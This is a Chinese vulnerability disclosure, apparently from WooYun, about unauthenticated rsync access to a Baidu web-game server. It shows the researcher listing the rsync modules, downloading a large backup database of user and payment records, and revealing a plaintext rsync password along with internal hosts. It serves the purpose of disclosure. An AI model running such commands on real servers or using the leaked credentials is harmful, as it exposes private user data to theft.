2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-22: 厂商已经确认,细节仅向厂商公开 2015-10-02: 细节向核心白帽子及相关领域专家公开 2015-10-12: 细节向普通白帽子公开 2015-10-22: 细节向实习白帽子公开 2015-11-06: 细节向公众公开
百度游戏一处rsync未授权访问可获取备份数据库
root@sScanner-node-3:~# rsync 180.76.19.138:: --port=8190backup log root@sScanner-node-3:~# rsync 180.76.19.138::backup/ --port=8190drwxr-xr-x 4,096 2015/08/13 06:00:57 .drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.10drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.11drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.110drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.118drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.165drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.172drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.174drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.175drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.179drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.183drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.184drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.190drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.191drwxr-xr-x 4,096 2015/09/22 06:00:03 111.206.39.193drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.196drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.20drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.201drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.207drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.209drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.210drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.211drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.214drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.217drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.218drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.223drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.226drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.227drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.228drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.229drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.23drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.231drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.232drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.234drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.31drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.32drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.33drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.4drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.7drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.14drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.144drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.15drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.17drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.19drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.2drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.20drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.22drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.23drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.24drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.25drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.3drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.41drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.7drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.8drwxr-xr-x 4,096 2015/08/12 06:00:02 111.206.43.211drwxr-xr-x 4,096 2015/08/12 06:00:02 111.206.43.223drwxr-xr-x 4,096 2015/08/12 06:00:02 111.206.43.224root@sScanner-node-3:~# rsync 180.76.19.138::backup/111.206.39.10/ --port=8190drwxr-xr-x 4,096 2015/09/22 06:00:02 .-rw-r--r-- 548,931,485 2015/09/22 06:00:37 backup.sql
导入backup.sql后,查看包括约1万用户名,但并不包含密码等个人信息,可游戏充值记录等数据。对应游戏:
http://youxi.baidu.com/gjqt/
root@sScanner-node-3:~# rsync 180.76.19.138::log/rsync_log.sh ./ --port=8190root@sScanner-node-3:~# cat rsync_log.sh #!/bin/bash#env RSYNC_PASSWORD=topsecret rsync -av --exclude-from="/home/data/rsync/log/exclude_tmp.txt" --port 8190 gjqt@b1.gjqt.baiduwebgame.com::log /home/data/rsync/logenv RSYNC_PASSWORD=topsecret rsync -avz --port 8190 gjqt@b1.gjqt.baiduwebgame.com::log /home/data/rsync/log
认证,禁止未授权访问
危害等级:中
漏洞Rank:6
确认时间:2015-09-22 17:50
感谢关注百度安全!
暂无